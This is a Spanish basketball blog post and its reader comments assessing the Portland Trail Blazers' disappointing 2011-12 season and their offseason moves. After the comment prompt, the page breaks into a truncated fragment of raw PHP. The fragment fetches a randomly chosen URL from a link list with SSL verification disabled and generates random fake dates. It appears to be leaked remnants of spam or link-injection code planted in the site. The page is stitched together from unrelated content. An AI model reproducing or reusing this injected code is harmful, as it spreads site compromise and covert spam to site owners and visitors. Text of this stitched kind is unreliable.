Portland Trail Blazers: Suspenso

19 de July de 2012 por Jose_Dantley

En el análisis previo hacíamos mención a la mala suerte que acumulaban los Blazers hasta llegar al comienzo de temporada. Las bajas definitivas de Roy y Oden, no por más temidas, fueron menos dañinas para el equipo de Oregón. Sin embargo, anticipábamos que un quinteto formado por Felton-Matthews-Batum-Wallace-Aldridge, con las aportaciones del banquillo y especialmente del anotador Jamal Crawford y del incombustible Marcus Camby, deberían bastar para alcanzar los playoffs. Estábamos equivocados.

La primera parte de la temporada hacía pensar que veríamos a Portland en la postemporada. Un espectacular inicio de 8 victorias en los primeros 10 partidos confirmaba los pronósticos. En estos partidos todo el quinteto titular estaba produciendo a gran nivel. McMillan apostaba por Felton, Matthews, Wallace, Aldridge y Camby, con Crawford de sexto. No fue más que un espejismo. Poco a poco el nivel de producción fue disminuyendo. El esfuerzo de Aldridge no se veía recompensado. Es difícil señalar un culpable concreto. Lesiones conocidas aparte, todos los estamentos aportaron su grano de arena a la paulatina caída en juego y resultados, desde la escasa flexibilidad de McMillan, hasta la decepcionante dirección de juego por parte de Felton, pasando por el ya familiar individualismo de Crawford o el escaso basketball IQ de Wallace.

Una vez se esfumaron las posibilidades de playoffs, Oshley decidió prescindir de los servicios de McMillan para darle la oportunidad a Kaleb Canales, que se convirtió en el entrenador más joven de la liga. Este movimiento completaba un comienzo de reconstrucción del equipo que sobre la bocina de la fecha límite de traspasos, enviaba a Gerald Wallace a los Nets y a Marcus Camby a los Rockets a cambio fundamentalmente de expirings y rondas de draft. En un último movimiento, los Blazers se hicieron con los servicios de J.J. Hickson que acabaría siendo una de las pocas sorpresas agradables. En estas condiciones y con Aldridge finalizando la temporada prematuramente para recuperarse de una lesión de cadera, los Blazers cerraron la liga regular con siete derrotas consecutivas para un balance final de 28-38, el peor de los últimos años.

Lo mejor: Nos decantamos por dos de las pocas dosis de optimismo que ha permitido la temporada. Por un lado, la confirmación de Aldridge como jugador franquicia, disputando su primer all-star y dando síntomas de poder llevar el peso del equipo sobre sus espaldas. Por otro lado, la decisión de Oshley y del propietario Paul Allen –unas de las 50 personas más ricas del universo conocido-, de cambiar el rumbo de la franquicia. Tras las decepciones de Oden y Roy no podían seguir viviendo de la nostalgia de lo que pudiera haber sido la franquicia.

Lo peor: La confirmación de los peores pronósticos de la lesión de Brandon Roy. La ausencia de jugadores que dieran un paso al frente para acompañar a Aldridge. En este sentido, Batum amagó con momentos en los que parecía poder dar el salto pero quizá la falta de confianza, quizá los problemas físicos de final de temporada, se lo impidieron.

Jugando a GM:

Parte del trabajo se hizo durante la temporada pasada y lo que llevamos de offseason. Vía draft Portland  se ha hecho con los servicios del puede ser su base titular, el anotador Damian Lillard, y ha incorporado a Meyers Leonard  –el McGee blanco- y  Will Barton. Llegan también a la franquicia procedentes de drafts anteriores Víctor Claver y Joel Freeland. Además se han asegurado a J.J. Hickson y han dejado marchar –opinamos que con buen criterio- a Felton. Jamal Crawford utilizó su player option para marcharse a los Clippers. Vía traspaso han adquirido a Jared Jeffries y Dan Gadzuric. Actualmente tienen a 13 jugadores en plantilla de los que la gran mayoría tendrán minutos limitados. Para completar la plantilla, acaban de tomar la gran decisión igualando la oferta de los Wolves por Batum. Aceptarla supone perder flexibilidad salarial, pero dejarlo marchar habría supuesto asumir el riesgo de que no haya un sustituto de garantías a menor precio.

Finalmente queda por aclarar quién será el entrenador. Canales parece contar con pocas posibilidades. Suenan no menos de una docena de nombres, por lo que todos los rumores habrá que ponerlos en cuarentena.

Nuestra estrategia pasaría por buscar un entrenador/formador y dejar correr la temporada. Me plantearía la opción de si iniciar la temporada directamente en tanking mode o intentar mostrar las posibilidades del equipo para intentar la firma de algún buen agente libre en el próximo verano, aunque la firma de Batum les resta opciones.

Comenta

4 comentarios a esta entrada

  1. Q dice:
    #1

    Lo mejor que podría hacer el GM de Portland es cambiar todos los servicios médicos del club.

    Una cosa es mala suerte y otra cosa es lo que le ha pasado a Portland todos estos años.

      Citar

  2. Esteban dice:
    #2

    me parece que se han movido muy bien, lillard puede ser sensacion este mismo año, y entre freeland y leonard deberian ayudar a aldrigue, el resto casi que ya esta, Matthews, Batum y Aldridge son un nucleo mas que bueno para darle acogida a los 4 rookies que presentaran esta temporada

    me encanta lillard, creo que estara a losd 20 ppp, haciendo uan dupla enorme con aldridge

      Citar

  3. Sancho88 dice:
    #3

    Pues sí, es un suspenso lo de los Blazers clarísimo. Partían como uno de los 8 fijos en playoffs por el Oeste y decpecionaron como pocos. McMillan penoso, Crawford a rachas pero pocas pocas, Felton a su rollo, y Batum tampoco acabó de aparecer. Me gusta mucho Mathews, no opino igual que tú sobre el IQ de Wallace, al menos en lo que se refiere al apartado defensivo del juego, y tampoco tiene mala mano y mal liderazgo en la ofensiva, y creo que fallaron dejando marchar a Camby. Yo le habría dado tb mas minutos a Craig Smith. Casi lo peor del equipo fue que McMillan se puso el traje del jefe del Costa Concordia y se piró dejándoles ahogados a todos. Sí, lloró y tal, bla bla blí y bla bla bla, pero yo me refiero a que se piró desde el principio. Los Blazers han jugado sin entrenador. Con un tipo en el banco pero que no aportaba nada. Si a eso le sumamos que la mayoría de jugadores han jugado muy por debajo de su nivel a pesar de ser buenas apuestas en los despachos (o eso creíamos), pues el suspenso está a la orden del día. A ver qué hacen Claver y Freeland. Si esto fuera la supermanager, directamente yo diría…. quitar quitar quitar!!! el Rafamierdas y el Kaloyano son más fiables, ejejej

      Citar

  4. Ru dice:
    #4

    A mí me jode muchísimo para el Supermanager lo de Freeland ¬¬ jajaja.Poco futuro veo a Claver allí pero bueno.Siempre he sido de la opinión de que con el nuevo convenio habría salto de jugadores de Europa cuyos derechos estuvieran en la NBA y aunque hablo de intución Portland debe tener unos cuantos.

    Obvio recalcar la mala temporada de Portland si bien siempre defendí que mirando al futuro habían hecho buenos movimientos y se podrían permitir una reconstrucción rápida de 1-2 años,si bien ahora mismo me tiene algo mosca la incógnita del banquillo.Ah,y la elección de Leonard en el draft….hubiera preferido ver a Zeller ahí pero bueno,habrá tiempo para analizar en la temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>